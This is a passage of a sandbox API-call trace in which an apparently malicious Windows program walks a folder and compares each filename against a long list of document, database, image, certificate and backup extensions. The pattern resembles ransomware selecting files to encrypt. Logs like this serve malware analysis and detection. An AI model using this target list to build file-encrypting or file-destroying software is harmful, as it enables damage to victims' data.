(lpString=".jsf") returned 4 [0168.755] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0168.755] lstrlenW (lpString=".json") returned 5 [0168.756] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0168.756] lstrlenW (lpString=".jsp") returned 4 [0168.756] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".kdc") returned 4 [0168.756] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".kmz") returned 4 [0168.756] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".kwm") returned 4 [0168.756] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".lasso") returned 6 [0168.756] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0168.756] lstrlenW (lpString=".lbi") returned 4 [0168.756] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".lgf") returned 4 [0168.756] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".lgp") returned 4 [0168.756] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".log") returned 4 [0168.756] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".m1v") returned 4 [0168.756] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".m4a") returned 4 [0168.756] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".m4v") returned 4 [0168.756] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".max") returned 4 [0168.756] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0168.756] lstrlenW (lpString=".md") returned 3 [0168.756] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0168.757] lstrlenW (lpString=".mda") returned 4 [0168.757] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mdb") returned 4 [0168.757] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mde") returned 4 [0168.757] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mdf") returned 4 [0168.757] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mdw") returned 4 [0168.757] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mef") returned 4 [0168.757] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mft") returned 4 [0168.757] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mfw") returned 4 [0168.757] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mht") returned 4 [0168.757] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mhtml") returned 6 [0168.757] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0168.757] lstrlenW (lpString=".mka") returned 4 [0168.757] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mkidx") returned 6 [0168.757] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0168.757] lstrlenW (lpString=".mkv") returned 4 [0168.757] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0168.757] lstrlenW (lpString=".mos") returned 4 [0168.758] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mov") returned 4 [0168.758] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mp3") returned 4 [0168.758] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mp4") returned 4 [0168.758] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mpeg") returned 5 [0168.758] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0168.758] lstrlenW (lpString=".mpg") returned 4 [0168.758] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mpv") returned 4 [0168.758] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mrw") returned 4 [0168.758] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".msg") returned 4 [0168.758] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".mxl") returned 4 [0168.758] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".myd") returned 4 [0168.758] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".myi") returned 4 [0168.758] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".nef") returned 4 [0168.758] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".nrw") returned 4 [0168.758] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0168.758] lstrlenW (lpString=".obj") returned 4 [0168.759] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".odb") returned 4 [0168.759] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".odc") returned 4 [0168.759] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".odm") returned 4 [0168.759] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".odp") returned 4 [0168.759] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".ods") returned 4 [0168.759] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".oft") returned 4 [0168.759] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".one") returned 4 [0168.759] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".onepkg") returned 7 [0168.759] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0168.759] lstrlenW (lpString=".onetoc2") returned 8 [0168.759] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0168.759] lstrlenW (lpString=".opt") returned 4 [0168.759] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0168.759] lstrlenW (lpString=".oqy") returned 4 [0168.759] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".orf") returned 4 [0168.760] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".p12") returned 4 [0168.760] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".p7b") returned 4 [0168.760] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".p7c") returned 4 [0168.760] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pam") returned 4 [0168.760] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pbm") returned 4 [0168.760] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pct") returned 4 [0168.760] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pcx") returned 4 [0168.760] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pdd") returned 4 [0168.760] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pdf") returned 4 [0168.760] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pdp") returned 4 [0168.760] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pef") returned 4 [0168.760] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pem") returned 4 [0168.760] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pff") returned 4 [0168.760] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0168.760] lstrlenW (lpString=".pfm") returned 4 [0168.761] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0168.761] lstrlenW (lpString=".pfx") returned 4 [0168.761] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0168.761] lstrlenW (lpString=".pgm") returned 4 [0168.761] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0168.761] lstrlenW (lpString=".php") returned 4 [0168.761] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0168.761] lstrlenW (lpString=".php3") returned 5 [0168.761] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0168.761] lstrlenW (lpString=".php4") returned 5 [0168.761] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0168.761] lstrlenW (lpString=".php5") returned 5 [0168.761] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0168.761] lstrlenW (lpString=".phtml") returned 6 [0168.761] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0168.761] lstrlenW (lpString=".pict") returned 5 [0168.761] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0168.761] lstrlenW (lpString=".pl") returned 3 [0168.761] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0168.761] lstrlenW (lpString=".pls") returned 4 [0168.761] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0168.761] lstrlenW (lpString=".pm") returned 3 [0168.761] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0168.761] lstrlenW (lpString=".png") returned 4 [0168.761] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0168.761] lstrlenW (lpString=".pnm") returned 4 [0168.761] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".pot") returned 4 [0168.762] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".potm") returned 5 [0168.762] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0168.762] lstrlenW (lpString=".potx") returned 5 [0168.762] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0168.762] lstrlenW (lpString=".ppa") returned 4 [0168.762] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".ppam") returned 5 [0168.762] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0168.762] lstrlenW (lpString=".ppm") returned 4 [0168.762] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".pps") returned 4 [0168.762] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".ppsm") returned 5 [0168.762] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0168.762] lstrlenW (lpString=".ppt") returned 4 [0168.762] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".pptm") returned 5 [0168.762] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0168.762] lstrlenW (lpString=".pptx") returned 5 [0168.762] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0168.762] lstrlenW (lpString=".prn") returned 4 [0168.762] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0168.762] lstrlenW (lpString=".ps") returned 3 [0168.762] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0168.762] lstrlenW (lpString=".psb") returned 4 [0168.763] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".psd") returned 4 [0168.763] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".pst") returned 4 [0168.763] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".ptx") returned 4 [0168.763] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".pub") returned 4 [0168.763] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".pwm") returned 4 [0168.763] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".pxr") returned 4 [0168.763] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".py") returned 3 [0168.763] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0168.763] lstrlenW (lpString=".qt") returned 3 [0168.763] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0168.763] lstrlenW (lpString=".r3d") returned 4 [0168.763] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".raf") returned 4 [0168.763] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0168.763] lstrlenW (lpString=".rar") returned 4 [0168.763] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0168.763] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0168.764] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0168.764] FindNextFileW (in: hFindFile=0x802558, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0168.764] FindClose (in: hFindFile=0x802558 | out: hFindFile=0x802558) returned 1 [0168.764] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0168.764] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0168.764] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0168.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030") returned 26 [0168.764] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802118 [0168.765] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.765] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.766] lstrlenW (lpString="eula.rtf") returned 8 [0168.766] lstrlenW (lpString=".1cd") returned 4 [0168.766] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0168.766] lstrlenW (lpString=".3ds") returned 4 [0168.766] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0168.766] lstrlenW (lpString=".3fr") returned 4 [0168.766] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0168.766] lstrlenW (lpString=".3g2") returned 4 [0168.766] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0168.766] lstrlenW (lpString=".3gp") returned 4 [0168.766] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0168.766] lstrlenW (lpString=".7z") returned 3 [0168.766] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0168.766] lstrlenW (lpString=".accda") returned 6 [0168.766] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0168.766] lstrlenW (lpString=".accdb") returned 6 [0168.766] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0168.766] lstrlenW (lpString=".accdc") returned 6 [0168.766] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0168.766] lstrlenW (lpString=".accde") returned 6 [0168.766] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0168.766] lstrlenW (lpString=".accdt") returned 6 [0168.766] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0168.766] lstrlenW (lpString=".accdw") returned 6 [0168.767] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0168.767] lstrlenW (lpString=".adb") returned 4 [0168.767] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".adp") returned 4 [0168.767] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".ai") returned 3 [0168.767] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0168.767] lstrlenW (lpString=".ai3") returned 4 [0168.767] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".ai4") returned 4 [0168.767] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".ai5") returned 4 [0168.767] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".ai6") returned 4 [0168.767] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".ai7") returned 4 [0168.767] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".ai8") returned 4 [0168.767] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".anim") returned 5 [0168.767] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0168.767] lstrlenW (lpString=".arw") returned 4 [0168.767] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0168.767] lstrlenW (lpString=".as") returned 3 [0168.767] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0168.767] lstrlenW (lpString=".asa") returned 4 [0168.767] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".asc") returned 4 [0168.768] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".ascx") returned 5 [0168.768] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0168.768] lstrlenW (lpString=".asm") returned 4 [0168.768] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".asmx") returned 5 [0168.768] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0168.768] lstrlenW (lpString=".asp") returned 4 [0168.768] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".aspx") returned 5 [0168.768] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0168.768] lstrlenW (lpString=".asr") returned 4 [0168.768] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".asx") returned 4 [0168.768] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".avi") returned 4 [0168.768] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".avs") returned 4 [0168.768] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".backup") returned 7 [0168.768] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0168.768] lstrlenW (lpString=".bak") returned 4 [0168.768] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".bay") returned 4 [0168.768] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0168.768] lstrlenW (lpString=".bd") returned 3 [0168.769] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0168.769] lstrlenW (lpString=".bin") returned 4 [0168.769] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".bmp") returned 4 [0168.769] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".bz2") returned 4 [0168.769] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".c") returned 2 [0168.769] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0168.769] lstrlenW (lpString=".cdr") returned 4 [0168.769] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".cer") returned 4 [0168.769] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".cf") returned 3 [0168.769] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0168.769] lstrlenW (lpString=".cfc") returned 4 [0168.769] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".cfm") returned 4 [0168.769] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".cfml") returned 5 [0168.769] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0168.769] lstrlenW (lpString=".cfu") returned 4 [0168.769] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".chm") returned 4 [0168.769] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".cin") returned 4 [0168.769] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0168.769] lstrlenW (lpString=".class") returned 6 [0168.770] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0168.770] lstrlenW (lpString=".clx") returned 4 [0168.770] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".config") returned 7 [0168.770] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0168.770] lstrlenW (lpString=".cpp") returned 4 [0168.770] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".cr2") returned 4 [0168.770] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".crt") returned 4 [0168.770] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".crw") returned 4 [0168.770] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".cs") returned 3 [0168.770] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0168.770] lstrlenW (lpString=".css") returned 4 [0168.770] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".csv") returned 4 [0168.770] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".cub") returned 4 [0168.770] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".dae") returned 4 [0168.770] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".dat") returned 4 [0168.770] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0168.770] lstrlenW (lpString=".db") returned 3 [0168.770] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0168.771] lstrlenW (lpString=".dbf") returned 4 [0168.771] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dbx") returned 4 [0168.771] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dc3") returned 4 [0168.771] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dcm") returned 4 [0168.771] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dcr") returned 4 [0168.771] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".der") returned 4 [0168.771] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dib") returned 4 [0168.771] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dic") returned 4 [0168.771] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".dif") returned 4 [0168.771] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".divx") returned 5 [0168.771] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0168.771] lstrlenW (lpString=".djvu") returned 5 [0168.771] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0168.771] lstrlenW (lpString=".dng") returned 4 [0168.771] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".doc") returned 4 [0168.771] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.771] lstrlenW (lpString=".docm") returned 5 [0168.771] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0168.772] lstrlenW (lpString=".docx") returned 5 [0168.772] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.772] lstrlenW (lpString=".dot") returned 4 [0168.772] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned 